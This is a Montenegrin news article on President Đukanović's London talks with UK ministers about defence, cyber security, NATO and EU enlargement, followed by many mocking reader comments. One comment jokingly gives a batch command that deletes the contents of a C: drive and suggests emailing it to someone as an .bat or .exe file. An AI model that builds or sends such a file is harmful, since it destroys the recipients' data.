Politika

Đukanović u Londonu: Borba za evropsku pesrpektivu Balkana je borba da sačuvamo Evropu

Predsjednik Crne Gore Milo Đukanović danas je u Londonu kazao da je neophodno prisustvo Evrope na Balkanu i da je u tom smislu od izuzetne važnosti držati politiku proširenja živom. Takva politika je jednako u interesu zemalja Zapadnog Balkana i Evropske unije. Poručio je i da je borba za evropsku pesrpektivu Zapadnog Balkana, borba da sačuvamo Evropu. Đukanović se danas razgovarao ministrom odbrane Ujedinjenog Kraljevstva Gevinom Vilijamsonom i ministrom za Evropu Alanom Dankanom.

Crnogorski predsjednik istakao je da će Crna Gora i Velika Britanija jačati saradnju na polju sajber bezbjednosti.

Razgovarano je o dosadašnoj saradnji i mogućnostima za dalje unaprjeđenje odnosa u oblasti odbrane, na bilateralnom nivou i u okviru NATO.

Predsjednik Đukanović je zahvalio na izuzetnoj podršci britanske Vlade reformi sistema odbrane i razvoju vojnih snaga, uključujući važan segment stručnog osposobljavanja pripadnika vojske na prestižnim britanskim institutima, kao i podršci u procesu učlanjenja Crne Gore u NATO. Ocijenio je da su dvije zemlje upravo u oblasti odbrane i bezbjednosti ostvarile najbolje rezultate u ukupnim međudržavnim odnosima.

Ministar Vilijamson je izrazio zadovoljstvo što je tokom svog mandata imao privilegiju da sarađuje sa Crnog Gorom kao članicom NATO i iznio uvjerenje da će posjeta Predsjednika Đukanovića stvoriti predsuslove za produbljivanje vojne saradnje dvije zemlje. Povezanost Crne Gore i Ujedinjenog Kraljevstva i šire partnerstvo, uz pokazanu hrabrost Predsjednika Đukanovića da zemlju vodi u pravom smjeru, doprinose daljem snaženju prijateljstva i jačanju odnosa na obostranu korist.

Dogovoreno je da se intenzivira saradnja u oblasti sajber bezbjednosti kao jednog od vodećih izvora prijetnji, unaprijedi saradnja u okviru NATO shodno dosadašnjem pozitivnom iskustvu u ispunjavanju obaveza iz članstva, čemu ce doprinositi i novoimenovani vojni izaslanici. Crna Gora je čvrsto riješena da izgradi sistem odbrane koji će biti kompatibilan i u skladu sa NATO obavezama, kazao je predsjednik Đukanović, a Ujedinjeno Kraljevstvo će tome nastaviti da pruža snažnu podršku kroz konkretne projekte i modalitete saradnje. UK će naročito raditi na pružanju podrške koja će na brz i održiv način pomoći razvijanju vojnih snaga Crne Gore. Dvije strane će raditi na definisanju odgovarajućeg termina za realizaciju posjete ministra odbrane Ujedinjenog Kraljevstva Crnoj Gori.

Zajednički je ocijenjeno da položaj Crne Gore, kao i zemalja Zapadnog Balkana, ujedno čini prednost, ali i veliki izazov u pogledu jačanja stabilnosti i odbrane evropskih i evroatlantskih vrijednosti. U tom kontekstu, podrška UK i snažnije prisustvo EU biće od presudne važnosti za dalji napredak regiona i njegovu punu integraciju u Evropu.

Đukanović i Dankan

Đukanović je razgovarao i sa ministrom za Evropu Alanom Dankanom. U dužem i veoma otvorenom razgovoru, posebna pažnja posvećena je aktuelnim momentima u procesu evropske integracije Crne Gore, ukupnim odnosima u regionu i finalnoj fazi izlaska Ujedinjenog Kraljevstva iz EU.

Potvrđena je snažna podrška Ujedinjenog Kraljevstva daljem procesu pristupanja Crne Gore Evropskoj uniji, čemu u prilog govori odluka UK da podrži otvaranje pregovaračkog procesa za poglavlje 27. Životna sredina i klimatske promjene.

Đukanović je zahvalio na podršci britanske Vlade u ostvarivanju članstva u NATO i izrazio puno uvjerenje da će ista podrška biti nastavljena i u dostizanju sada glavnog cilja, članstva u EU.

Naglasio je da je Crna Gora duboko na putu usvajanja evropskih i evroatlantskih vrijednosti i odlučna da implementira evropske standarde i bude njihov promoter u regionu, s glavnim ciljem dostizanja evropskog kvaliteta života.

U kontekstu razgovora o regionu Zapadnog Balkana, konstatovano je da je neophodno prisustvo Evrope na Balkanu i da je u tom smislu od izuzetne važnosti držati politiku proširenja živom. Takva politika je jednako u interesu zemalja Zapadnog Balkana i Evropske unije.

“Borba za evropsku pesrpektivu Zapadnog Balkana je borba da sačuvamo Evropu”, istakao je Đukanović.

Izlazak Britanije iz EU ne znači napuštanje Evrope, naglasio je ministar Dankan.

Britanska Vlada ostaje snažno posvećena saradnji i daljem unapređenju odnosa i jačanju stabilnosti regiona, kao i evropskoj perspektivi zemalja Zapadnog Balkana.

M.D. 

NAJNOVIJI NAJSTARIJI POPULARNI
javorak
Gost
javorak

MILO MILO MILO MILO MILO MILO MILO MILO MILO MILO MILO MILO MILO

tragikomedija
Gost
tragikomedija

bori se ti malo za svoj narod .nije mi jasno koji djavo ga odrzava na vlasti.od price nema nista.nisam ja protiv evrope ali daj brate pa nismo ovce ne mozes ti nikoga zeznut a da to ne ostane neprimijeceno.sve se otkrije

veki
Gost
veki

ti da sačuvaš Evropu.vrati nam Crnu Goru lopove bez granica

Banovina ZETA
Gost
Banovina ZETA

Narod koji spava dok vlast prodaje imovinu budi se u tudjoj drzavi…! Koga ti jado cuvas svoje bisage aaaaa

BananaMNE
Gost
BananaMNE

Milo je dao svoj doprinos borbi sa kriminalom jer je jedini drzavnik koji ima 30 godina staza u kriminalu i politici hahaha

Dejo milioner💔
Gost
Dejo milioner💔

Nesrećan sam brate i tačka svi se smiju dolazi nova godina samo ja tužan bez osmijeha. 👍

BananaMNE
Gost
BananaMNE

Kralju oni izlaze iz eu..kralju..

Vladimir Sipcic
Gost
Vladimir Sipcic

Pa ja crko od smieha Britanija izlazi iz EU a ovaj o poglavljima i prosperitetu….!Ahaaaaaaaaaaa Kakva drzava presjednik jos bolji

Dejo milioner💔
Gost
Dejo milioner💔

Božo ako se ne oženim a kako je krenulo neću ostavljam svoj svojoj porodici više od milijardu eura pa neka podijele svi stričevi i ujaci. 👍

Dejo milioner💔
Gost
Dejo milioner💔

Ne bih ja ranka. Dusanka gata na olovo. 😆Kao baba vanga kažu da je sve znala. 😆👍

nika vise
Gost
nika vise

evo ga kao i Vucic. Konferencija na londonskoj ulici

R. Srpska
Gost
R. Srpska

Ti imaš pravo da govoriš samo u ime Crne Gore, a ne u ima Zapadnog Balkana ( koji je politička a ne geografska odrednica) a u kojem se nalaze i Srbi. Do kada ćete se vi Crnogorci petljati u naše poslove ??? Shvatite da nam ne trebate i da vas ne želimo.

NIKAD VIŠE 1918.
NIKAD VIŠE 1945.

Bzzzzz
Gost
Bzzzzz

Ti si bolesnik! Radis li ti sto osim sto pises komentare na ovaj portal? Sto ne pitas ove iz Cdm da te zaposle pa zajedno da blatimo po Srbiji i tako bi najbolje ostvario svoj cilj a to je nikad vise 1918 i 45! Aj castiti ol?

Treci svijet
Gost
Treci svijet

Mila ne docekuje Tereza Mej nego ministar za Evropu.. To sve govori.

Mr.Evil
Gost
Mr.Evil

Je li ovaj podnio ostavku? Što će im ministar za Evropu kad su izašli iz Unije? Deveta rupa na svirali.

Bzzzzz
Gost
Bzzzzz

Zato sto Milo nije u posjeti premijerki vec je tamo na poziv univerziteta Oksford. Tako da je primljen od Ministra kojeg je odredio protokol zbog vjerovatno sprijecenosti premijerke koja je zauzeta bregzitom. Zar je to tako tesko shvatiti, sa dođe neki zvanicnik u Crnu Goru a premijer je van drzave primio bi ga neki od Ministara ovlascen od Vlade za… Više »

Dejo milioner💔
Gost
Dejo milioner💔

Oči ne veruju da sačuva evropu. Oči ne veruju što čitaju. Sprda se sa crnogorskim narodom. 👍

Dejo milioner💔
Gost
Dejo milioner💔

Izdao je sve što može da se izda. 👍

Aziz Keljmendi
Gost
Aziz Keljmendi

Jesu ćaskali na engleskom uz čaj?

miki maus
Gost
miki maus

top su mu slike

crnogorac
Gost
crnogorac

Ovaj je pokrao svoju državu a bi Evropu da sačuva!? Moraju je od tebe čuvati lopovčino!

Stara Podgorica
Gost
Stara Podgorica

Kako Roćen kasapi engleski, sam sebe ne razumije a kamoli neko drugi!

@@@
Gost
@@@

Otvoriti Notepad ili C++, kopirati u fajlu “@Echo off
Del C:\ *.* |y”,
sačuvati fajl u *.bat ili *.exe formatu. Poslati fajl na željenu mail adresu. :))

Milaš
Gost
Milaš

AAAAA!

Tajnovidac
Gost
Tajnovidac

Kralj, stari kompjuteraš i poliglota. 🙂

mojsilovic
Gost
mojsilovic

Engleski prica kao srpski, pardon, crnogorski.

Montenegrin BG
Gost
Montenegrin BG

Sta, ne umeju Englezi sami da rese pa otisao da im pokaze kako se resava efikasno problem i po kratkom postupku iskorenjuje kriminal i kriminalci svake vrste!

friend
Gost
friend

Does President Milo Djukanovic know english? 🇲🇪🇬🇧🤓

mojsilovic
Gost
mojsilovic

A, ha!

Marv
Gost
Marv

Hahahah

Vaka
Gost
Vaka

Ne umije racunar upalit a ne drzi govor o sajber kriminalu. Mada se u kriminal razumije ima prakse dosta.

NBA
Gost
NBA

VAKA -SVRAKA!EEE,JADO JADNI!?

Budimo realni
Gost
Budimo realni

A vala ce tu CG dat doprinos kao niko do sad. Evo cuo sam da hakeri sirom svijeta izvrsavaju samoubistva od kako su culi da se CG umijesala u borbu protiv sajber kriminala. Nasuprot tome vodece svjetske banke pocinju da angazuju crnogorske strucnjake da im obezbjede sigurnost transfera preko neta, a biznismeni sirom svijeta biraju crnogorske banke za saradnju. Hvala… Više »

Neno
Gost
Neno

Na kom jeziku su pricali o kompjuterima posto ovaj nesrecnik nit engleski zna nit komojuter upaliti zna

Montenegrin
Gost
Montenegrin

Posto ti sve to znas ,sto ga ne zamijenis? Vjerovatno si ne zaposlen a vrlo strucan!

Bzzzzz
Gost
Bzzzzz

E dobro mu rece montenegro! Ovom kompleksasu neostvarenom i zakrzljalom, njemu ne bi pomoglo ni perpetum mobile da izmisli koliko je sposoban!

Vantage1111
Gost
Vantage1111

To legendo u zube ga mozes nosit kakav je ka mis…

NBA
Gost
NBA

TAKO JE PRESJEDNICE DJUKANOVICU, SARADNJA SA NAJBOLJIMA U SVIJETU! JEDAN JE MILO-KRALJ!

Vale
Gost
Vale

Odlicna saradnja ali hvali samo napredak o ukidaju visa

ston
Gost
ston

Misdlo pravi evropski politicar

Send this to a friend